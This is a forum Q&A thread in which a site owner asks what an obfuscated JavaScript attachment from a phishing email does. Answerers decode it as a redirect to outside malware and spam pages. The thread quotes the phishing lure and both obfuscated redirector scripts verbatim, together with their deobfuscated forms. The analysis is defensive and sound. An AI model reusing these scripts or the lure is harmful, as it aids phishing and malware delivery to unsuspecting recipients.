views:

257

answers:

5

I've just found out that a spammer is sending email from our domain name, pretending to be us, saying:

Dear Customer,

This e-mail was send by ourwebsite.com to notify you that we have temporanly prevented access to your account.

We have reasons to beleive that your account may have been accessed by someone else. Please run attached file and Follow instructions.

(C) ourwebsite.com (I changed that)

The attached file is an HTML file that has the following javascript:

<script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';</script>

Another email had this:

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

Can anyone tells me what it does? So we can see if we have a vulnerability, and if we need to tell our customers about it ...

Thanks

+5  A: 

Answer:

The script executes

document.location.href = "http://mvblaw.com/z.htm";    //Evil site (I assume)

It also contains a large number of useless lines to hide the script's true purpose.

Analysis

Here it is unpacked.

function mD() {};
this.aB = 43719;
mD.prototype = {
    i: function () {
        var w = new Date();
        this.j = '';
        var x = function () {};
        var a = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
        var d = new Date();
        y = "";
        aL = "";
        var f = document;
        var s = function () {};
        this.yE = "";
        aN = "";
        var dL = '';
        var iD = f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
        this.v = "v";
        var q = 27427;
        var m = new Date();
        iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
        dE = '';
        k = "";
        var qY = function () {};
    }
};
xO = false;
var b = new mD();
yY = "";
b.i();
this.xT = '';

Cleaning up the obfuscations and adding meaningful names, it becomes

function TempClass() {};
this.aB = 43719;
TempClass.prototype = {
    doIt: function () {
        var w = new Date();
        this.j = '';
        var x = function () {};
        var a = "http://mvblaw.com/z.htm";    //Evil site (I assume)

        var d = new Date();
        y = "";
        aL = "";
        var f = document;
        var s = function () {};
        this.yE = "";
        aN = "";
        var dL = '';
        var iD = f['location'];
        this.v = "v";
        var q = 27427;
        var m = new Date();
        iD['href'] = a;
        dE = '';
        k = "";
        var qY = function () {};
    }
};
xO = false;
var b = new TempClass();
yY = "";
b.doIt();
this.xT = '';

Removing all of the useless lines, it becomes

function TempClass() {};

TempClass.prototype = {
    doIt: function () {
        var a = "http://mvblaw.com/z.htm";    //Evil site (I assume)

        var f = document;
        var iD = f['location'];
        iD['href'] = a;
    }
};

var b = new TempClass();
b.doIt();
SLaks
http:// mvblaw . com/z.htm after regexp. All it seems to do is redirect to that address.
Glenn
The link is now down (standard Apache 404); you don't need to worry about it.
SLaks
So you don't think this targets specifically our website then? It's just a generic email and they use our name?
nute
Is this better?
Glenn
SLaks, the link for the second script is live. And it looks bad.
nute
It's trying to redirect the user to http://mvblaw.com/z.htm. In line 8, that string looks like a bunch of jibberish, but the replace method that follows strips out the characters in the regular expressions, leaving http://mvblaw.com/z.htm. They do the same thing later to set the location.href value of the browser window, redirecting the user to that z.htm page that probably had malware or something else evil happening on it.
wmid
Glenn - if you mean, is it better that it's just a random email, yes: I was afraid it was script designed to make our users do things on our website, that would then lead to the script affecting other people visiting our site ...
nute
@nute: The second link redirects to a different site, which sends no content.
SLaks
well, you can `view-source:http://mvblaw.com/z.htm` in google chrome to see what's the codes inside...
Reigel
+3  A: 

No geniuses, they:

hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');

h t t p : / / m v b l a w . c o m / z . h t m


f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];

   l o c a t i o n

iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;

    h r e f

Didn't even need to run it through regex :)

I'm going to assume they hacked mvblaw and snuck the payload page on there. Anyone with a VM want to see what it does?

egrunin
it seems the second script sends to lendermedia . com/images/z.htm, which is a canadian pharmacy, and it tried to load some java code too.
nute
A: 

It may be related to this StackOverflow question

If you Google the script in question, don't follow the links, they triggered my anti-virus

LittleBobbyTables
Yes, that's the same one. Great nym, btw :)
egrunin
yeah! great name!... :D
Reigel
A: 

Basically, it appears to set (document['location'])['href'] (or, in regular speak, document.location.href) to http://mvblaw.com/z.htm.

The obfuscation code is pretty simple, just replacing the noise characters with nothing:

var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
    // a = http://mvblaw.com/z.htm
var f=document;
var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
    // iD = document.location
iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
    // document.location.href = a (the URL above).
paxdiablo
+3  A: 

The script has a lot of useless stuff just to create confusion, the essential parts of the script are:

function mD() {};
mD.prototype = {
  i: function () {
     // read between every two letters:
     var a = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'
              .replace(/[gJG,\<]/g, '');
     var f = document;
     var iD = f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
     iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
   }
};
var b = new mD();
b.i();

If we clean up more:

function mD() {};
mD.prototype = {
  i: function () {
     var a = 'http://mvblaw.com/z.htm';
     var f = document;
     var iD = f['location'];
     iD['href'] = a;
   }
};
var b = new mD();
b.i();

And more:

function mD() {};
mD.prototype = {
  i: function () {
     document.location.href = 'http://mvblaw.com/z.htm';
   }
};
var b = new mD();
b.i();
CMS